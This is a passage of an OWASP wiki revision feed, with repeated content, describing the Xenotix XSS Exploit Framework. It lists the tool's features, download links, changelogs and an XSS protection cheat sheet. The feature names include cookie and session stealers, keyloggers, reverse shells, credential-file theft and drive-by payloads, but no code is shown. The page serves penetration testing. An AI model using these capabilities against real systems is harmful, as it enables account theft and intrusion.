**Session Stealer Addon (Persistent)&lt;br /&gt;
**Keylogger Addon (Persistent)&lt;br /&gt;
**DDoSer Addon (Persistent)&lt;br /&gt;
**Linux Credential File Stealer Addon (Persistent)&lt;br /&gt;
**Drop and Execute Addon (Persistent)&lt;br /&gt;
&lt;br /&gt;
'''AUXILIARY MODULES'''&lt;br /&gt;
*WebKit Developer Tools&lt;br /&gt;
*Encoder/Decoder&lt;br /&gt;
*JavaScript Encoders&lt;br /&gt;
**JSFuck 6 Char Encoder&lt;br /&gt;
**jjencode Encoder&lt;br /&gt;
**aaencode Encoder&lt;br /&gt;
*JavaScript Beautifier&lt;br /&gt;
*Hash Calculator&lt;br /&gt;
*Hash Detector&lt;br /&gt;
*View Injected JavaScript&lt;br /&gt;
*View XSS Payloads&lt;br /&gt;
&lt;br /&gt;
'''XENOTIX SCRIPTING ENGINE'''&lt;br /&gt;
* Xenotix API&lt;br /&gt;
* IronPython Scripting Support&lt;br /&gt;
* Trident and Gecko Web Engine Support&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Conference Talks =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' NULLCON GOA 2013 '''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|J1phYXmLX8w}}&lt;br /&gt;
&lt;br /&gt;
''' CLUBHACK 2012 '''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|NYZLP0q7-y4}}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Screenshots =&lt;br /&gt;
&lt;br /&gt;
{|&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
[[Image:POST_SCANNER.png|500px|thumb|right|Xenotix POST Request Scanner]] &lt;br /&gt;
|&lt;br /&gt;
[[Image:XENOTIX INFO.png|500px|thumb|left|Xenotix Information Gathering Modules]]&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
[[Image:XENOTIX EXPLOITATION.png|thumb|500px|right|Xenotix Exploitation Modules]]&lt;br /&gt;
|&lt;br /&gt;
[[Image:Scripting.png|thumb|500px|left|Xenotix Scripting Engine]]&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=Downloads=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====IMPORTANT====&lt;br /&gt;
Antivirus Solutions may detect it as a threat. However it is due to the features in the exploitation framework.&lt;br /&gt;
&lt;br /&gt;
====Latest Release====&lt;br /&gt;
&lt;br /&gt;
[[Image:Dwd.png | 200px | link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.rar]]&lt;br /&gt;
* Mirror [https://drive.google.com/file/d/0B_Ci-1YbMqshYzBZZ0l1MTdOcUE/view?usp=sharing Download V6 From GDrive]&lt;br /&gt;
MD5: bcfc69de2e16b59cf7e1df6aa3fb153f&lt;br /&gt;
* Download V5 http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V5.rar&lt;br /&gt;
MD5: bdfce2d4af4012ecc20b86bed876a54a&lt;br /&gt;
&lt;br /&gt;
====Requirements====&lt;br /&gt;
* Microsoft .NET Framework 4.0 http://www.microsoft.com/en-in/download/details.aspx?id=17718&lt;br /&gt;
* IronPython 2.7.3 http://ironpython.codeplex.com/downloads/get/423690&lt;br /&gt;
====Older Versions====&lt;br /&gt;
*Version 4.5 http://opensecurity.in/downloads/Xenotix_XSS_Exploit_Framework_v4.5.rar&lt;br /&gt;
*Version 4 https://www.dropbox.com/s/ookdse6pyszh736/Xenotix%20XSS%20Exploit%20Framework%20V4.rar&lt;br /&gt;
*Version 3 https://www.owasp.org/index.php/File:OWASP_Xenotix_XSS_Exploit_Framework_v3_2013.zip&lt;br /&gt;
*Version 2 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploit_Framework_2013_v2.zip&lt;br /&gt;
*Version 1 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploitation_Framework.zip&lt;br /&gt;
====Source====&lt;br /&gt;
* GitHub https://github.com/ajinabraham/OWASP-Xenotix-XSS-Exploit-Framework/&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
= Documentation =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Version 5 Videos'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|loZSdedJnqc}}&lt;br /&gt;
&lt;br /&gt;
'''Version 4.5 Videos'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|jm1-_nTlhzY}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Version 4 Videos'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|dCo5BCJWOdA}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Version 3 Videos'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|CJEgO4_kd-8}} &lt;br /&gt;
{{#ev:youtube|owfF9C_Xerw}} &lt;br /&gt;
{{#ev:youtube|i8c3kf4t6A8}} &lt;br /&gt;
{{#ev:youtube|IT-8IH3yRrA}} &lt;br /&gt;
{{#ev:youtube|cgLGgVWvi9Y}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Roadmap =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
''' WHAT'S NEW! '''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|RhGVuus_NJw}}&lt;br /&gt;
==V6 Changes==&lt;br /&gt;
&lt;br /&gt;
* Intelli Fuzzer&lt;br /&gt;
* Context Based Fuzzer&lt;br /&gt;
* Blind Fuzzer&lt;br /&gt;
* HTA Network Configuration&lt;br /&gt;
* HTA Drive-By&lt;br /&gt;
* HTA Drive-By Reverse Shell&lt;br /&gt;
* JSFuck 6 Char Encoder&lt;br /&gt;
* jjencode Encoder&lt;br /&gt;
* aaencode Encoder&lt;br /&gt;
* IP to Location&lt;br /&gt;
* IP to GeoLocation&lt;br /&gt;
* IP Hinting&lt;br /&gt;
* Download Spoofer&lt;br /&gt;
* HTML5 Geolocation API&lt;br /&gt;
* Reverse TCP Shell Addon (Linux)&lt;br /&gt;
* OAuth 1.0a Request Scanner&lt;br /&gt;
* 4800+ Payloads&lt;br /&gt;
* SSL Error Fixed&lt;br /&gt;
&lt;br /&gt;
==V5 Changes==&lt;br /&gt;
* Xenotix Scripting Engine&lt;br /&gt;
* Xenotix API&lt;br /&gt;
* V4.5 Bug Fixes&lt;br /&gt;
* GET Network IP (Information Gathering)&lt;br /&gt;
* QR Code Generator for Xenotix xook&lt;br /&gt;
* HTML5 WebCam Screenshot(Exploitation Module)&lt;br /&gt;
* HTML5 Get Page Screenshot (Exploitation Module)&lt;br /&gt;
* Find Feature in View Source.&lt;br /&gt;
* Improved Payload Count to 1630&lt;br /&gt;
* Name Changes&lt;br /&gt;
 &lt;br /&gt;
==V4.5 Changes==&lt;br /&gt;
&lt;br /&gt;
* JavaScript Beautifier&lt;br /&gt;
* Pause and Resume support for Scan&lt;br /&gt;
* Jump to Payload&lt;br /&gt;
* Cookie Support for POST Request&lt;br /&gt;
* Cookie Support and Custom Headers for Header Scanner &lt;br /&gt;
* Added TRACE method Support&lt;br /&gt;
* Improved Interface&lt;br /&gt;
* Better Proxy Support &lt;br /&gt;
* WAF Fingerprinting&lt;br /&gt;
* Load Files &amp;lt;exploitation module&amp;gt;&lt;br /&gt;
* Hash Calculator&lt;br /&gt;
* Hash Detector&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= XSS Protection Cheat Sheet =&lt;br /&gt;
&lt;br /&gt;
[[Image:Xss_protection.png|center]]&lt;br /&gt;
&lt;br /&gt;
The Ultimate XSS Protection Cheat Sheet for Developers is a compilation of information available on XSS Protection from various organization, researchers, websites, and from our own experience.&lt;br /&gt;
This document follows a simple language and justifying explanations that helps a developer to implement the correct XSS defense and to build a secure web application that prevents XSS vulnerability and Post XSS attacks. It will also discuss about the existing methods or functions provided by various programming languages to mitigate XSS vulnerability. This document will be updated regularly in order to include updated and correct in information in the domain of XSS Protection.&lt;br /&gt;
&lt;br /&gt;
VIEW: [https://docs.google.com/viewer?srcid=0B_Ci-1YbMqshWUtlaGRyLVBVd28&amp;amp;amp;pid=explorer&amp;amp;amp;efh=false&amp;amp;amp;a=v&amp;amp;amp;chrome=false&amp;amp;amp;embedded=true THE ULTIMATE XSS PROTECTION CHEAT SHEET FOR DEVELOPERS]			&lt;br /&gt;
&lt;br /&gt;
= Get Involved =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Involvement in the development of Xenotix is highly encouraged!&lt;br /&gt;
&lt;br /&gt;
Here are some of the ways you can help:&lt;br /&gt;
&lt;br /&gt;
==Support Us==&lt;br /&gt;
&lt;br /&gt;
*Facebook Page: [https://www.facebook.com/xenotix Xenotix on Facebook]&lt;br /&gt;
*Official Page: [[http://www.opensecurity.in/owasp-xenotix-xss-exploit-framework-v4-2013  Xenotix @ OpenSecurity]]&lt;br /&gt;
&lt;br /&gt;
==Feedback &amp;amp; Queries==&lt;br /&gt;
&lt;br /&gt;
* Do you have any issues with it?&lt;br /&gt;
* Do you find any design flows or errors?&lt;br /&gt;
* Do you need help in using it?&lt;br /&gt;
* Do you have something to tell about it?&lt;br /&gt;
&lt;br /&gt;
Then please use this form: https://docs.google.com/forms/d/1RpUhQvuHGvPTl7Gi-EXzecidGvJwKpsRaY9-MeXm1ro/viewform&lt;br /&gt;
&lt;br /&gt;
==Development==&lt;br /&gt;
&lt;br /&gt;
Are you a developer? Do you have some cool ideas to contribute? Get in touch via '''ajin [DOT] abraham [AT] owasp.org''' &lt;br /&gt;
If you actively contribute to Xenotix then you will be invited to join the project. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]]  [[Category:OWASP_Breakers]] [[Category:OWASP_Defenders]]&lt;br /&gt;
[[Category:OWASP_Project|Xenotix XSS Exploit Framework Project]] [[Category:OWASP_Tool]] [[Category:OWASP_Release_Quality_Tool|OWASP Release Quality Tool]] [[Category:OWASP_Download]]&lt;/div&gt;</summary>
		<author><name>Ajin Abraham</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_Xenotix_XSS_Exploit_Framework&amp;diff=183698</id>
		<title>OWASP Xenotix XSS Exploit Framework</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_Xenotix_XSS_Exploit_Framework&amp;diff=183698"/>
				<updated>2014-10-15T06:20:18Z</updated>
		
		<summary type="html">&lt;p&gt;Ajin Abraham: Version 5 Download link correction&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:20px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
==OWASP Xenotix XSS Exploit Framework 6==&lt;br /&gt;
&lt;br /&gt;
[[Image:Xen6.png|left|550px]]&lt;br /&gt;
'''OWASP Xenotix XSS Exploit Framework''' is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework. Xenotix provides Zero False Positive XSS Detection by performing the Scan within the browser engines where in real world, payloads get reflected. Xenotix Scanner Module is incorporated with 3 intelligent fuzzers to reduce the scan time and produce better results. If you really don't like the tool logic, then leverage the power of Xenotix API to make the tool work like you wanted it to be.&lt;br /&gt;
It is claimed to have the world’s 2nd largest XSS Payloads of about 4800+ distinctive XSS Payloads. It is incorporated with a feature rich Information Gathering module for target Reconnaissance. The Exploit Framework includes real world offensive XSS exploitation modules for Penetration Testing and Proof of Concept creation.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;paypal&amp;gt;OWASP Xenotix XSS Exploit Framework&amp;lt;/paypal&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== LICENSING ==&lt;br /&gt;
OWASP Xenotix XSS Exploit Framework is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:175px;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== PRESENTATIONS ==&lt;br /&gt;
&lt;br /&gt;
'''DEFCON DCG Banglore 2013'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/pwning-with-xss-from-alert-to-reverse-shell-defcon-banglore-2013 OWASP Xenotix XSS Exploit Framework v4 ]&lt;br /&gt;
&lt;br /&gt;
'''BlackHat Europe Arsenal 2013'''&lt;br /&gt;
*Presentation: [https://www.dropbox.com/s/o8adyvtngbszq32/blackhat.zip OWASP Xenotix XSS Exploit Framework v3 ]&lt;br /&gt;
&lt;br /&gt;
'''Nulcon Goa 2013'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/owasp-xenotix-xss-exploit-framework-v3-nullcon-goa-2013 OWASP Xenotix XSS Exploit Framework v3 ]&lt;br /&gt;
'''ClubHack 2012'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/xenotix-xss-exploit-framework-clubhack-2012 OWASP Xenotix XSS Exploit Framework v2]&lt;br /&gt;
&lt;br /&gt;
== PROJECT LEADER ==&lt;br /&gt;
&lt;br /&gt;
Ajin Abraham | [https://twitter.com/ajinabraham @ajinabraham]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== AWARDS ==&lt;br /&gt;
&lt;br /&gt;
[[Image:ToolsWatch.png‎ |180px | thumb | left |link=http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ | Top 5th Security Tool of 2013]]&lt;br /&gt;
[[Image:CSPF.jpg |180px | thumb | left | Recommended by CSPF]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:175px;&amp;quot; | &lt;br /&gt;
&lt;br /&gt;
== QUICK DOWNLOAD ==&lt;br /&gt;
&lt;br /&gt;
[[Image:Dwd.png |200px| link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.rar]]&lt;br /&gt;
&lt;br /&gt;
== NEWS AND EVENTS ==&lt;br /&gt;
* [14 Sept 2014] Xenotix XSS Exploit Framework V6 is Released&lt;br /&gt;
* [14 Feb 2014] Xenotix XSS Exploit Framework V5 is Released&lt;br /&gt;
* [16 Dec 2013] [http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ Top 5th Security tool of 2013, voted by ToolsWatch Readers]&lt;br /&gt;
* [10 Nov 2013] [http://holisticinfosec.org/toolsmith/pdf/november2013.pdf OWASP Xenotix in ISSA Journal]&lt;br /&gt;
* [01 Nov 2013] [http://holisticinfosec.blogspot.in/2013/11/toolsmith-owasp-xenotix-xss-exploit.html Toolsmith Tool of the Month]&lt;br /&gt;
&lt;br /&gt;
== RELATED PROJECTS ==&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Xelenium_Project]]&lt;br /&gt;
* [[ZAP]]&lt;br /&gt;
* [[OWASP_XSSER]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Ohloh ==&lt;br /&gt;
&lt;br /&gt;
*https://www.ohloh.net/p/OWASP-Xenotix-XSS-Exploit-Framework&lt;br /&gt;
&lt;br /&gt;
== CLASSIFICATIONS ==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; rowspan=&amp;quot;2&amp;quot;| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-breakers-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Project_Type_Files_CODE.jpg|link=]]&lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Features =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''SCANNER MODULES'''&lt;br /&gt;
&lt;br /&gt;
*GET Request Manual Mode&lt;br /&gt;
*GET Request Auto Mode&lt;br /&gt;
*Multiple Parameter Scanner&lt;br /&gt;
*GET Request Fuzzer&lt;br /&gt;
*POST Request Fuzzer&lt;br /&gt;
*Advanced Request Fuzzer&lt;br /&gt;
*OAuth 1.0a Request Scanner&lt;br /&gt;
*DOM Scanner&lt;br /&gt;
*Hidden Parameter Detector&lt;br /&gt;
&lt;br /&gt;
'''INFORMATION GATHERING MODULES'''&lt;br /&gt;
&lt;br /&gt;
*WAF Fingerprinting&lt;br /&gt;
*Victim Fingerprinting&lt;br /&gt;
**IP to Location&lt;br /&gt;
**IP to GeoLocation&lt;br /&gt;
*Network&lt;br /&gt;
**Network IP (WebRTC)&lt;br /&gt;
**Ping Scan&lt;br /&gt;
**Port Scan&lt;br /&gt;
**Internal Network Scan&lt;br /&gt;
*Browser&lt;br /&gt;
**Fingerprinting&lt;br /&gt;
**Features Detector&lt;br /&gt;
&lt;br /&gt;
'''EXPLOITATION MODULES'''&lt;br /&gt;
&lt;br /&gt;
*Send Message&lt;br /&gt;
*Cookie Thief&lt;br /&gt;
*Keylogger&lt;br /&gt;
*HTML5 DDoSer&lt;br /&gt;
*Load File&lt;br /&gt;
*Grab Page Screenshot&lt;br /&gt;
*JavaScript Shell&lt;br /&gt;
*Reverse HTTP WebShell&lt;br /&gt;
*Metasploit Browser Exploit&lt;br /&gt;
*Social Engineering&lt;br /&gt;
**Phisher&lt;br /&gt;
**Tabnabbing&lt;br /&gt;
**Live WebCam Screenshot&lt;br /&gt;
**Download Spoofer&lt;br /&gt;
**Geolocation HTML5 API&lt;br /&gt;
**Java Applet Drive-By (Windows)&lt;br /&gt;
**Java Applet Drive-By Reverse Shell (Windows)&lt;br /&gt;
**HTA Network Configuration (Windows, IE)&lt;br /&gt;
**HTA Drive-By (Windows, IE)&lt;br /&gt;
**HTA Drive-By Reverse Shell (Windows, IE)&lt;br /&gt;
*Firefox Addons&lt;br /&gt;
**Reverse TCP Shell Addon (Windows, Persistent)&lt;br /&gt;
**Reverse TCP Shell Addon (Linux, Persistent)&lt;br /&gt;
**Session Stealer Addon (Persistent)&lt;br /&gt;
**Keylogger Addon (Persistent)&lt;br /&gt;
**DDoSer Addon (Persistent)&lt;br /&gt;
**Linux Credential File Stealer Addon (Persistent)&lt;br /&gt;
**Drop and Execute Addon (Persistent)&lt;br /&gt;
&lt;br /&gt;
'''AUXILIARY MODULES'''&lt;br /&gt;
*WebKit Developer Tools&lt;br /&gt;
*Encoder/Decoder&lt;br /&gt;
*JavaScript Encoders&lt;br /&gt;
**JSFuck 6 Char Encoder&lt;br /&gt;
**jjencode Encoder&lt;br /&gt;
**aaencode Encoder&lt;br /&gt;
*JavaScript Beautifier&lt;br /&gt;
*Hash Calculator&lt;br /&gt;
*Hash Detector&lt;br /&gt;
*View Injected JavaScript&lt;br /&gt;
*View XSS Payloads&lt;br /&gt;
&lt;br /&gt;
'''XENOTIX SCRIPTING ENGINE'''&lt;br /&gt;
* Xenotix API&lt;br /&gt;
* IronPython Scripting Support&lt;br /&gt;
* Trident and Gecko Web Engine Support&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Conference Talks =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' NULLCON GOA 2013 '''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|J1phYXmLX8w}}&lt;br /&gt;
&lt;br /&gt;
''' CLUBHACK 2012 '''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|NYZLP0q7-y4}}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Screenshots =&lt;br /&gt;
&lt;br /&gt;
{|&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
[[Image:POST_SCANNER.png|500px|thumb|right|Xenotix POST Request Scanner]] &lt;br /&gt;
|&lt;br /&gt;
[[Image:XENOTIX INFO.png|500px|thumb|left|Xenotix Information Gathering Modules]]&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
[[Image:XENOTIX EXPLOITATION.png|thumb|500px|right|Xenotix Exploitation Modules]]&lt;br /&gt;
|&lt;br /&gt;
[[Image:Scripting.png|thumb|500px|left|Xenotix Scripting Engine]]&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=Downloads=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====IMPORTANT====&lt;br /&gt;
Antivirus Solutions may detect it as a threat. However it is due to the features in the exploitation framework.&lt;br /&gt;
&lt;br /&gt;
====Latest Release====&lt;br /&gt;
&lt;br /&gt;
[[Image:Dwd.png | 200px | link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.rar]]&lt;br /&gt;
* Mirror https://drive.google.com/file/d/0B_Ci-1YbMqshYzBZZ0l1MTdOcUE/view?usp=sharing&lt;br /&gt;
MD5: bcfc69de2e16b59cf7e1df6aa3fb153f&lt;br /&gt;
* Download V5 http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V5.rar&lt;br /&gt;
MD5: bdfce2d4af4012ecc20b86bed876a54a&lt;br /&gt;
&lt;br /&gt;
====Requirements====&lt;br /&gt;
* Microsoft .NET Framework 4.0 http://www.microsoft.com/en-in/download/details.aspx?id=17718&lt;br /&gt;
* IronPython 2.7.3 http://ironpython.codeplex.com/downloads/get/423690&lt;br /&gt;
====Older Versions====&lt;br /&gt;
*Version 4.5 http://opensecurity.in/downloads/Xenotix_XSS_Exploit_Framework_v4.5.rar&lt;br /&gt;
*Version 4 https://www.dropbox.com/s/ookdse6pyszh736/Xenotix%20XSS%20Exploit%20Framework%20V4.rar&lt;br /&gt;
*Version 3 https://www.owasp.org/index.php/File:OWASP_Xenotix_XSS_Exploit_Framework_v3_2013.zip&lt;br /&gt;
*Version 2 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploit_Framework_2013_v2.zip&lt;br /&gt;
*Version 1 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploitation_Framework.zip&lt;br /&gt;
====Source====&lt;br /&gt;
* GitHub https://github.com/ajinabraham/OWASP-Xenotix-XSS-Exploit-Framework/&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
= Documentation =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Version 5 Videos'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|loZSdedJnqc}}&lt;br /&gt;
&lt;br /&gt;
'''Version 4.5 Videos'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|jm1-_nTlhzY}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Version 4 Videos'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|dCo5BCJWOdA}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Version 3 Videos'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|CJEgO4_kd-8}} &lt;br /&gt;
{{#ev:youtube|owfF9C_Xerw}} &lt;br /&gt;
{{#ev:youtube|i8c3kf4t6A8}} &lt;br /&gt;
{{#ev:youtube|IT-8IH3yRrA}} &lt;br /&gt;
{{#ev:youtube|cgLGgVWvi9Y}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Roadmap =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
''' WHAT'S NEW! '''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|RhGVuus_NJw}}&lt;br /&gt;
==V6 Changes==&lt;br /&gt;
&lt;br /&gt;
* Intelli Fuzzer&lt;br /&gt;
* Context Based Fuzzer&lt;br /&gt;
* Blind Fuzzer&lt;br /&gt;
* HTA Network Configuration&lt;br /&gt;
* HTA Drive-By&lt;br /&gt;
* HTA Drive-By Reverse Shell&lt;br /&gt;
* JSFuck 6 Char Encoder&lt;br /&gt;
* jjencode Encoder&lt;br /&gt;
* aaencode Encoder&lt;br /&gt;
* IP to Location&lt;br /&gt;
* IP to GeoLocation&lt;br /&gt;
* IP Hinting&lt;br /&gt;
* Download Spoofer&lt;br /&gt;
* HTML5 Geolocation API&lt;br /&gt;
* Reverse TCP Shell Addon (Linux)&lt;br /&gt;
* OAuth 1.0a Request Scanner&lt;br /&gt;
* 4800+ Payloads&lt;br /&gt;
* SSL Error Fixed&lt;br /&gt;
&lt;br /&gt;
==V5 Changes==&lt;br /&gt;
* Xenotix Scripting Engine&lt;br /&gt;
* Xenotix API&lt;br /&gt;
* V4.5 Bug Fixes&lt;br /&gt;
* GET Network IP (Information Gathering)&lt;br /&gt;
* QR Code Generator for Xenotix xook&lt;br /&gt;
* HTML5 WebCam Screenshot(Exploitation Module)&lt;br /&gt;
* HTML5 Get Page Screenshot (Exploitation Module)&lt;br /&gt;
* Find Feature in View Source.&lt;br /&gt;
* Improved Payload Count to 1630&lt;br /&gt;
* Name Changes&lt;br /&gt;
 &lt;br /&gt;
==V4.5 Changes==&lt;br /&gt;
&lt;br /&gt;
* JavaScript Beautifier&lt;br /&gt;
* Pause and Resume support for Scan&lt;br /&gt;
* Jump to Payload&lt;br /&gt;
* Cookie Support for POST Request&lt;br /&gt;
* Cookie Support and Custom Headers for Header Scanner &lt;br /&gt;
* Added TRACE method Support&lt;br /&gt;
* Improved Interface&lt;br /&gt;
* Better Proxy Support &lt;br /&gt;
* WAF Fingerprinting&lt;br /&gt;
* Load Files &amp;lt;exploitation module&amp;gt;&lt;br /&gt;
* Hash Calculator&lt;br /&gt;
* Hash Detector&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= XSS Protection Cheat Sheet =&lt;br /&gt;
&lt;br /&gt;
[[Image:Xss_protection.png|center]]&lt;br /&gt;
&lt;br /&gt;
The Ultimate XSS Protection Cheat Sheet for Developers is a compilation of information available on XSS Protection from various organization, researchers, websites, and from our own experience.&lt;br /&gt;
This document follows a simple language and justifying explanations that helps a developer to implement the correct XSS defense and to build a secure web application that prevents XSS vulnerability and Post XSS attacks. It will also discuss about the existing methods or functions provided by various programming languages to mitigate XSS vulnerability. This document will be updated regularly in order to include updated and correct in information in the domain of XSS Protection.&lt;br /&gt;
&lt;br /&gt;
